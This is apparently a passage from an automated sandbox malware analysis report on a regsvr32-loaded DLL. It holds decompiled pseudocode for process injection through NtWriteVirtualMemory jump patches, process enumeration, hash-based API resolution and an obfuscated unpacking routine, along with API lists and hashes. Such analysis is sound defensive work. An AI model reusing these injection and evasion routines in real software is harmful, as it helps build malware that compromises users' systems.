                                          • Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
                                          • Opcode Fuzzy Hash: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
                                          • Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 167 1000cb77-1000cb90 call 1000c4ce 170 1000cb96-1000cba4 call 1000c6c0 167->170 171 1000cc69-1000cc70 167->171 170->171 178 1000cbaa-1000cbe1 memset 170->178 172 1000cc80-1000cc87 171->172 173 1000cc72-1000cc79 FreeLibrary 171->173 176 1000cca3-1000cca9 172->176 177 1000cc89-1000cca2 call 1000861a 172->177 173->172 177->176 178->171 182 1000cbe7-1000cc27 NtProtectVirtualMemory 178->182 184 1000cc67 182->184 185 1000cc29-1000cc44 NtWriteVirtualMemory 182->185 184->171 185->184 186 1000cc46-1000cc65 NtProtectVirtualMemory 185->186 186->171 186->184
                                          C-Code - Quality: 93%
                                          			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
                                          				long _v8;
                                          				long _v12;
                                          				void* _v16;
                                          				intOrPtr _v23;
                                          				void _v24;
                                          				long _v28;
                                          				void* _v568;
                                          				void _v744;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				struct HINSTANCE__* _t32;
                                          				intOrPtr _t33;
                                          				intOrPtr _t35;
                                          				void* _t39;
                                          				intOrPtr _t43;
                                          				void* _t63;
                                          				long _t65;
                                          				void* _t70;
                                          				void** _t73;
                                          				void* _t74;
                                          
                                          				_t73 = __edx;
                                          				_t63 = __ecx;
                                          				_t74 = 0;
                                          				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
                                          					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
                                          					_t74 = _t39;
                                          					if(_t74 != 0) {
                                          						memset( &_v744, 0, 0x2cc);
                                          						_v744 = 0x10002;
                                          						_push( &_v744);
                                          						_t43 =  *0x1001e684; // 0x2e5faa0
                                          						_push(_t73[1]);
                                          						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
                                          							_t70 = _v568;
                                          							_v12 = _v12 & 0x00000000;
                                          							_v24 = 0xe9;
                                          							_t65 = 5;
                                          							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
                                          							_v8 = _t65;
                                          							_v16 = _t70;
                                          							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
                                          								L6:
                                          								_t74 = 0;
                                          							} else {
                                          								_v28 = _v28 & 0x00000000;
                                          								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
                                          									goto L6;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				_t32 =  *0x1001e77c; // 0x0
                                          				if(_t32 != 0) {
                                          					FreeLibrary(_t32);
                                          					 *0x1001e77c =  *0x1001e77c & 0x00000000;
                                          				}
                                          				_t33 =  *0x1001e784; // 0x0
                                          				if(_t33 != 0) {
                                          					_t35 =  *0x1001e684; // 0x2e5faa0
                                          					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
                                          					E1000861A(0x1001e784, 0xfffffffe);
                                          				}
                                          				return _t74;
                                          			}

























                                          APIs
                                            • Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
                                            • Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605
                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                                            • Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                                            • Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
                                            • Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
                                            • Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
                                            • Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                                          • memset.MSVCRT ref: 1000CBB8
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                                          • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
                                          • String ID:
                                          • API String ID: 317994034-0
                                          • Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                                          • Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
                                          • Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                                          • Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 187 1000aba3-1000abc7 CreateToolhelp32Snapshot 188 1000ac38-1000ac3e 187->188 189 1000abc9-1000abf2 memset Process32First 187->189 190 1000ac02-1000ac13 call 1000ccc0 189->190 191 1000abf4-1000ac00 189->191 195 1000ac15-1000ac26 Process32Next 190->195 196 1000ac28-1000ac35 CloseHandle 190->196 191->188 195->190 195->196 196->188
                                          C-Code - Quality: 100%
                                          			E1000ABA3(intOrPtr __ecx, void* __edx) {
                                          				void* _v304;
                                          				void* _v308;
                                          				signed int _t14;
                                          				signed int _t15;
                                          				void* _t22;
                                          				intOrPtr _t28;
                                          				void* _t31;
                                          				intOrPtr _t33;
                                          				void* _t40;
                                          				void* _t42;
                                          
                                          				_t33 = __ecx;
                                          				_t31 = __edx; // executed
                                          				_t14 = CreateToolhelp32Snapshot(2, 0);
                                          				_t42 = _t14;
                                          				_t15 = _t14 | 0xffffffff;
                                          				if(_t42 != _t15) {
                                          					memset( &_v304, 0, 0x128);
                                          					_v304 = 0x128;
                                          					if(Process32First(_t42,  &_v304) != 0) {
                                          						while(1) {
                                          							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
                                          							_t40 = _t22;
                                          							if(_t40 == 0) {
                                          								break;
                                          							}
                                          							_t33 =  *0x1001e684; // 0x2e5faa0
                                          							if(Process32Next(_t42,  &_v308) != 0) {
                                          								continue;
                                          							}
                                          							break;
                                          						}
                                          						CloseHandle(_t42);
                                          						_t15 = 0 | _t40 == 0x00000000;
                                          					} else {
                                          						_t28 =  *0x1001e684; // 0x2e5faa0
                                          						 *((intOrPtr*)(_t28 + 0x30))(_t42);
                                          						_t15 = 0xfffffffe;
                                          					}
                                          				}
                                          				return _t15;
                                          			}














                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
                                          • memset.MSVCRT ref: 1000ABD6
                                          • Process32First.KERNEL32(00000000,?), ref: 1000ABED
                                          • Process32Next.KERNEL32(00000000,?), ref: 1000AC21
                                          • CloseHandle.KERNEL32(00000000), ref: 1000AC2E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
                                          • String ID:
                                          • API String ID: 1267121359-0
                                          • Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                                          • Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
                                          • Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                                          • Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 197 1000dfad-1000dfc4 198 1000e021 197->198 199 1000dfc6-1000dfee 197->199 200 1000e023-1000e027 198->200 199->198 201 1000dff0-1000e013 call 1000c379 call 1000d400 199->201 206 1000e015-1000e01f 201->206 207 1000e028-1000e03f 201->207 206->198 206->201 208 1000e041-1000e049 207->208 209 1000e095-1000e097 207->209 208->209 210 1000e04b 208->210 209->200 211 1000e04d-1000e053 210->211 212 1000e063-1000e074 211->212 213 1000e055-1000e057 211->213 215 1000e076-1000e077 212->215 216 1000e079-1000e085 LoadLibraryA 212->216 213->212 214 1000e059-1000e061 213->214 214->211 214->212 215->216 216->198 217 1000e087-1000e091 GetProcAddress 216->217 217->198 218 1000e093 217->218 218->200
                                          C-Code - Quality: 100%
                                          			E1000DFAD(void* __ecx, intOrPtr __edx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				char _v92;
                                          				intOrPtr _t41;
                                          				signed int _t47;
                                          				signed int _t49;
                                          				signed int _t51;
                                          				void* _t56;
                                          				struct HINSTANCE__* _t58;
                                          				_Unknown_base(*)()* _t59;
                                          				intOrPtr _t60;
                                          				void* _t62;
                                          				intOrPtr _t63;
                                          				void* _t69;
                                          				char _t70;
                                          				void* _t75;
                                          				CHAR* _t80;
                                          				void* _t82;
                                          
                                          				_t75 = __ecx;
                                          				_v12 = __edx;
                                          				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                          				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                          				if(_t41 == 0) {
                                          					L4:
                                          					return 0;
                                          				}
                                          				_t62 = _t41 + __ecx;
                                          				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                          				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                          				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                          				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                          				_t47 = 0;
                                          				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                          				_v8 = 0;
                                          				_v16 = _t63;
                                          				if(_t63 == 0) {
                                          					goto L4;
                                          				} else {
                                          					goto L2;
                                          				}
                                          				while(1) {
                                          					L2:
                                          					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                          					_t51 = _v8;
                                          					if((_t49 ^ 0x218fe95b) == _v12) {
                                          						break;
                                          					}
                                          					_t73 = _v20;
                                          					_t47 = _t51 + 1;
                                          					_v8 = _t47;
                                          					if(_t47 < _v16) {
                                          						continue;
                                          					}
                                          					goto L4;
                                          				}
                                          				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                          				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                          				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                          					return _t80;
                                          				} else {
                                          					_t56 = 0;
                                          					while(1) {
                                          						_t70 = _t80[_t56];
                                          						if(_t70 == 0x2e || _t70 == 0) {
                                          							break;
                                          						}
                                          						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                          						_t56 = _t56 + 1;
                                          						if(_t56 < 0x40) {
                                          							continue;
                                          						}
                                          						break;
                                          					}
                                          					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                          					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                          					if( *((char*)(_t56 + _t80)) != 0) {
                                          						_t80 =  &(( &(_t80[1]))[_t56]);
                                          					}
                                          					_t40 =  &_v92; // 0x6c6c642e
                                          					_t58 = LoadLibraryA(_t40); // executed
                                          					if(_t58 == 0) {
                                          						goto L4;
                                          					}
                                          					_t59 = GetProcAddress(_t58, _t80);
                                          					if(_t59 == 0) {
                                          						goto L4;
                                          					}
                                          					return _t59;
                                          				}
                                          			}


























                                          APIs
                                          • LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
                                          • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: .dll
                                          • API String ID: 2574300362-2738580789
                                          • Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                                          • Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
                                          • Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                                          • Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 236 192c41-192c4e 237 192c50-192c72 236->237 238 192c75-192c7c 236->238 237->238 239 192c7e-192ca3 238->239 240 192cc2-192cca 238->240 239->240 249 192ca5-192cbf 239->249 242 192d5d-192d65 240->242 243 192cd0-192cd7 240->243 245 192d7f-192d93 242->245 246 192d67-192d7e 242->246 247 192cd9-192cfa 243->247 248 192cfd-192d11 243->248 250 192d99-192da6 245->250 251 192e1b-192e25 245->251 246->245 247->248 259 192d13-192d42 248->259 260 192d45-192d5a 248->260 249->240 257 192da8-192dcf 250->257 258 192dd2-192df4 250->258 254 192e48-192e4f 251->254 255 192e27-192e47 251->255 262 192fd0-192fdd 254->262 263 192e55-192e5c 254->263 255->254 257->258 258->251 271 192df6-192e18 258->271 259->260 260->242 267 192fdf-192fff 262->267 268 193000 262->268 269 192e62-192e69 263->269 270 192ef5-192f14 263->270 267->268 277 193003-193006 268->277 275 192e6b-192e80 269->275 276 192e81-192e8e 269->276 273 192f3b-192f43 270->273 274 192f16-192f38 270->274 271->251 278 192f49-192f50 273->278 279 192fcd 273->279 274->273 275->276 292 192ebe-192ed9 276->292 293 192e90-192ebb 276->293 280 19309c-1930a5 277->280 281 19300c-193013 277->281 284 192f88-192fcc 278->284 285 192f52-192f82 278->285 290 1930a8-1930b2 280->290 286 193035-19303c 281->286 287 193015-193032 281->287 284->279 285->284 294 19303e-193060 286->294 295 193063-193070 286->295 287->286 296 1930d4-1930e8 290->296 297 1930b4-1930d3 290->297 292->270 301 192edb-192eef 292->301 293->292 294->295 295->290 302 1930ea-19310f 296->302 303 193112-19311c 296->303 297->296 301->270 302->303 304 19311e-193140 303->304 305 193143-19315a 303->305 304->305 310 19315c-193181 305->310 311 193184-19318e 305->311 310->311 315 193190-1931bf 311->315 316 1931c2-1931ca 311->316 315->316 318 1931cc-1931ee 316->318 319 1931f1-193204 LoadLibraryA 316->319 318->319 320 193205-19320b 319->320 323 19330d-193319 320->323 324 193211-193218 320->324 327 19331b-193334 323->327 328 193337 323->328 
325 19321a-193233 324->325 326 193236-19323e 324->326 325->326 329 193261-19326d 326->329 330 193240-193260 326->330 327->328 331 19333e-193352 328->331 336 19326f-193291 329->336 337 193294-1932a7 329->337 330->329 334 19336a-193381 331->334 335 193354-193367 OleUninitialize 331->335 341 193383-1933a3 334->341 342 1933a6-1933c2 334->342 335->334 336->337 338 1932a9-1932cb 337->338 339 1932ce-1932e8 337->339 338->339 339->331 341->342 347 1933f2-19341a 342->347 348 1933c4-1933ef 342->348 349 19341c-193443 347->349 350 193446-19344e 347->350 348->347 349->350 350->320 352 193454-19345b 350->352 354 19347a-193489 352->354 355 19345d-193479 352->355 354->277 356 19348f-193496 354->356 355->354 357 193498-1934b3 OleInitialize 356->357 358 1934b4-1934b8 356->358 357->358 358->277 360 1934be-1934d7 358->360
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
                                          • Instruction ID: f8ab75d52a69b329a44d82504609a59d5b49dd538a973494d856eb557a218d60
                                          • Opcode Fuzzy Hash: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
                                          • Instruction Fuzzy Hash: 10425B72D00609DFEF04CFA0C9897AA7BB5FF64311F18546ADD0DAE149C77815A4CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 361 193073-19309b 363 19309c-1930a5 361->363 364 1930a8-1930b2 363->364 365 1930d4-1930e8 364->365 366 1930b4-1930d3 364->366 367 1930ea-19310f 365->367 368 193112-19311c 365->368 366->365 367->368 369 19311e-193140 368->369 370 193143-19315a 368->370 369->370 373 19315c-193181 370->373 374 193184-19318e 370->374 373->374 376 193190-1931bf 374->376 377 1931c2-1931ca 374->377 376->377 379 1931cc-1931ee 377->379 380 1931f1-193204 LoadLibraryA 377->380 379->380 381 193205-19320b 380->381 384 19330d-193319 381->384 385 193211-193218 381->385 388 19331b-193334 384->388 389 193337 384->389 386 19321a-193233 385->386 387 193236-19323e 385->387 386->387 390 193261-19326d 387->390 391 193240-193260 387->391 388->389 392 19333e-193352 389->392 397 19326f-193291 390->397 398 193294-1932a7 390->398 391->390 395 19336a-193381 392->395 396 193354-193367 OleUninitialize 392->396 402 193383-1933a3 395->402 403 1933a6-1933c2 395->403 396->395 397->398 399 1932a9-1932cb 398->399 400 1932ce-1932e8 398->400 399->400 400->392 402->403 408 1933f2-19341a 403->408 409 1933c4-1933ef 403->409 410 19341c-193443 408->410 411 193446-19344e 408->411 409->408 410->411 411->381 413 193454-19345b 411->413 415 19347a-193489 413->415 416 19345d-193479 413->416 417 19348f-193496 415->417 418 193003-193006 415->418 416->415 420 193498-1934b3 OleInitialize 417->420 421 1934b4-1934b8 417->421 418->363 419 19300c-193013 418->419 423 193035-19303c 419->423 424 193015-193032 419->424 420->421 421->418 425 1934be-1934d7 421->425 426 19303e-193060 423->426 427 193063-193070 423->427 424->423 426->427 427->364
                                          APIs
                                          • LoadLibraryA.KERNEL32(00192C25,00192C25,458F0000,?,00000000), ref: 001931F1
                                          • OleUninitialize.OLE32(00192C25), ref: 00193354
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd
                                          Similarity
                                          • API ID: LibraryLoadUninitialize
                                          • String ID:
                                          • API String ID: 2978721001-0
                                          • Opcode ID: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
                                          • Instruction ID: 1697d18d80ef6043c18960079b27b0b3ab06fb3af575f4bc99e482d315fa9304
                                          • Opcode Fuzzy Hash: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
                                          • Instruction Fuzzy Hash: 0BD16A72C00615DFEF04CFA0C9897AABBB5FF64311F09546ADD49AF149C73816A4CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 479 191424-191431 call 19463b 482 1914b1-1914c9 479->482 483 191433-19143a 479->483 486 1914cb-1914f2 482->486 487 1914f5-191510 482->487 484 19143c-19146d 483->484 485 19146e-191484 483->485 484->485 490 1914ab VirtualAlloc 485->490 491 191486-1914a8 485->491 486->487 488 1915b7-1915b9 487->488 489 191516-19151d 487->489 495 1915bb-1915c2 488->495 496 191624-19164b 488->496 492 19151f-191552 489->492 493 191555-191565 489->493 490->482 491->490 492->493 498 191581-1915b1 VirtualProtect 493->498 499 191567-191580 493->499 503 1915e5-1915f8 495->503 504 1915c4-1915e4 495->504 500 19166d-191675 496->500 501 19164d-19166a 496->501 498->488 499->498 508 191709-191715 500->508 509 19167b-191682 500->509 501->500 505 1915fa-19161c 503->505 506 19161f call 193726 503->506 504->503 505->506 506->496 512 19174f-191758 508->512 513 191717-19174c 508->513 517 1916d3-1916db 509->517 518 191684-1916d0 509->518 522 19175a-19177c 512->522 523 19177f-191785 512->523 513->512 519 1916dd-191701 517->519 520 191704 call 194495 517->520 518->517 519->520 520->508 522->523 526 191787-19178e 523->526 527 191806-191826 523->527 529 191790-1917a3 526->529 530 1917a6-1917b3 526->530 529->530 533 1917d2 call 19242a 530->533 534 1917b5-1917cf 530->534 538 1917d7-1917de 533->538 534->533 539 1917fb-191801 call 193658 538->539 540 1917e0-1917f5 538->540 539->527 540->539
                                          C-Code - Quality: 50%
                                          			E00191424(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, signed int __esi, void* __eflags) {
                                          				void* _t154;
                                          				int _t155;
                                          				signed int _t158;
                                          				int _t159;
                                          				signed int _t160;
                                          				intOrPtr _t163;
                                          				signed int _t164;
                                          				signed int _t166;
                                          				signed int _t169;
                                          				signed int _t171;
                                          				intOrPtr _t175;
                                          				signed int _t176;
                                          				intOrPtr _t177;
                                          				signed int _t179;
                                          				signed int _t182;
                                          				signed int _t183;
                                          				signed int _t185;
                                          				signed int _t188;
                                          				signed int _t189;
                                          				signed int _t190;
                                          				void* _t192;
                                          				signed int _t193;
                                          				signed int _t194;
                                          				signed int _t212;
                                          				signed int _t215;
                                          				signed int _t224;
                                          				signed int _t225;
                                          				void* _t226;
                                          				void* _t227;
                                          				signed int _t234;
                                          				signed int _t237;
                                          				void* _t244;
                                          				signed int* _t246;
                                          
                                          				_t234 = __esi;
                                          				_t224 = __edi;
                                          				_t212 = __edx;
                                          				_t155 = E0019463B(_t154, __ebx, __ecx, __edi);
                                          				_push(__ecx);
                                          				_t188 = __ebx | __ebx;
                                          				_t185 = _t188;
                                          				_pop(_t189);
                                          				if(_t188 != 0) {
                                          					if( *(_t185 + 0x4358a4) == 0) {
                                          						_t183 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x435888)), 0xf,  *((intOrPtr*)(_t185 + 0x4353a6)), 0x1c4, 0x800);
                                          						 *_t246 = _t189;
                                          						 *(_t185 + 0x4358a4) = 0 ^ _t183;
                                          						_t189 = 0;
                                          					}
                                          					_push(4);
                                          					_push(0x1000);
                                          					_push( *((intOrPtr*)(_t185 + 0x435280)));
                                          					_push(0);
                                          					if( *(_t185 + 0x435585) == 0) {
                                          						_t182 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x43546a);
                                          						 *(_t244 - 8) = _t212;
                                          						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) & 0x00000000;
                                          						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) ^ (_t212 & 0x00000000 | _t182);
                                          						_t212 =  *(_t244 - 8);
                                          					}
                                          					_t155 = VirtualAlloc();
                                          				}
                                          				 *_t17 = _t155;
                                          				 *((intOrPtr*)(_t185 + 0x4354d2)) = 2;
                                          				if( *(_t185 + 0x435014) == 0) {
                                          					_t179 =  *((intOrPtr*)(_t185 + 0x441054))(_t185 + 0x435702, _t155);
                                          					 *(_t244 - 4) = _t224;
                                          					 *(_t185 + 0x435014) = 0 ^ _t179;
                                          					_t224 =  *(_t244 - 4);
                                          					_t155 = (_t179 & 0x00000000) +  *_t246;
                                          					_t246 =  &(_t246[1]);
                                          				}
                                          				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) & 0x00000000;
                                          				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) ^ _t234 & 0x00000000 ^ _t155;
                                          				_t237 = _t234;
                                          				if( *(_t185 + 0x4350b0) > 0) {
                                          					if( *((intOrPtr*)(_t185 + 0x43590c)) == 0) {
                                          						_t177 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x4351af)),  *((intOrPtr*)(_t185 + 0x435422)), 0x1d7, 0xf8,  *((intOrPtr*)(_t185 + 0x43539e)));
                                          						 *(_t244 - 8) = _t237;
                                          						 *((intOrPtr*)(_t185 + 0x43590c)) = _t177;
                                          						_t237 =  *(_t244 - 8);
                                          					}
                                          					_push(_t185 + 0x4354d2);
                                          					_push(0x40);
                                          					if( *(_t185 + 0x435968) == 0) {
                                          						_t176 =  *((intOrPtr*)(_t185 + 0x441058))();
                                          						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) & 0x00000000;
                                          						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) | _t189 -  *_t246 | _t176;
                                          						_t189 = _t189;
                                          					}
                                          					_t175 =  *((intOrPtr*)(_t185 + 0x441044))(_t185 + 0x43501c, _t185 + 0x4354ea,  *(_t185 + 0x435462));
                                          					 *_t246 = _t189;
                                          					 *((intOrPtr*)(_t185 + 0x4359f1)) = _t175;
                                          					_t189 = 0;
                                          					_t155 = VirtualProtect( *(_t185 + 0x4350b0), ??, ??, ??);
                                          				}
                                          				if(_t155 != _t185) {
                                          					if( *(_t185 + 0x435366) == 0) {
                                          						_t171 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4357ae);
                                          						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) & 0x00000000;
                                          						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) ^ _t224 & 0x00000000 ^ _t171;
                                          						_t224 = _t224;
                                          					}
                                          					_push( *((intOrPtr*)(_t185 + 0x43574e)));
                                          					_push( *((intOrPtr*)(_t185 + 0x435288)));
                                          					if( *(_t185 + 0x435248) == 0) {
                                          						_t169 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4358c8);
                                          						 *(_t244 - 8) = _t212;
                                          						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) & 0x00000000;
                                          						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) ^ (_t212 ^  *(_t244 - 8) | _t169);
                                          						_t212 =  *(_t244 - 8);
                                          					}
                                          					_t155 = E00193726(_t185, _t189, _t212, _t224, _t237); // executed
                                          				}
                                          				 *(_t244 - 4) = _t212;
                                          				_t190 = 0 ^  *(_t185 + 0x435462);
                                          				_t215 =  *(_t244 - 4);
                                          				 *(_t244 - 8) = _t155;
                                          				_t225 = 0 ^  *(_t185 + 0x4350b0);
                                          				_t158 =  *(_t244 - 8);
                                          				if( *((intOrPtr*)(_t185 + 0x4357a2)) == 0) {
                                          					_t158 =  *((intOrPtr*)(_t185 + 0x441060))();
                                          					 *_t79 = _t158;
                                          					_push( *(_t244 - 8));
                                          					_pop( *_t81);
                                          					 *_t82 = _t190;
                                          					_t190 = (_t190 & 0x00000000) +  *(_t244 - 4);
                                          				}
                                          				_t192 = _t225 | _t225;
                                          				_t226 = _t192;
                                          				_t193 = _t190;
                                          				if(_t192 != 0) {
                                          					if( *(_t185 + 0x435520) == 0) {
                                          						_t158 =  *((intOrPtr*)(_t185 + 0x4410a0))( *((intOrPtr*)(_t185 + 0x435681)),  *((intOrPtr*)(_t185 + 0x4353d2)),  *((intOrPtr*)(_t185 + 0x4354ba)),  *((intOrPtr*)(_t185 + 0x435796)),  *((intOrPtr*)(_t185 + 0x4354a2)), 0xdf, 0x400, _t193);
                                          						 *(_t244 - 8) = _t193;
                                          						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) & 0x00000000;
                                          						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) | _t193 & 0x00000000 ^ _t158;
                                          						_t193 =  *_t246;
                                          						_t246 =  &(_t246[1]);
                                          					}
                                          					_push(_t226);
                                          					if( *(_t185 + 0x4353c6) == 0) {
                                          						_t158 =  *((intOrPtr*)(_t185 + 0x44105c))(_t193);
                                          						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) & 0x00000000;
                                          						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) ^ _t237 & 0x00000000 ^ _t158;
                                          						_t237 = _t237;
                                          						_t193 = (_t193 & 0x00000000) +  *_t246;
                                          						_t246 = _t246 - 0xfffffffc;
                                          					}
                                          					_t158 = E00194495(_t158, _t185, _t193, _t215, _t226, _t237);
                                          				}
                                          				 *_t246 =  *_t246 ^ _t158;
                                          				_t159 = _t158;
                                          				if( *(_t185 + 0x435855) == 0) {
                                          					_t166 =  *((intOrPtr*)(_t185 + 0x4410a4))( *((intOrPtr*)(_t185 + 0x435615)), _t159);
                                          					 *(_t244 - 8) = _t226;
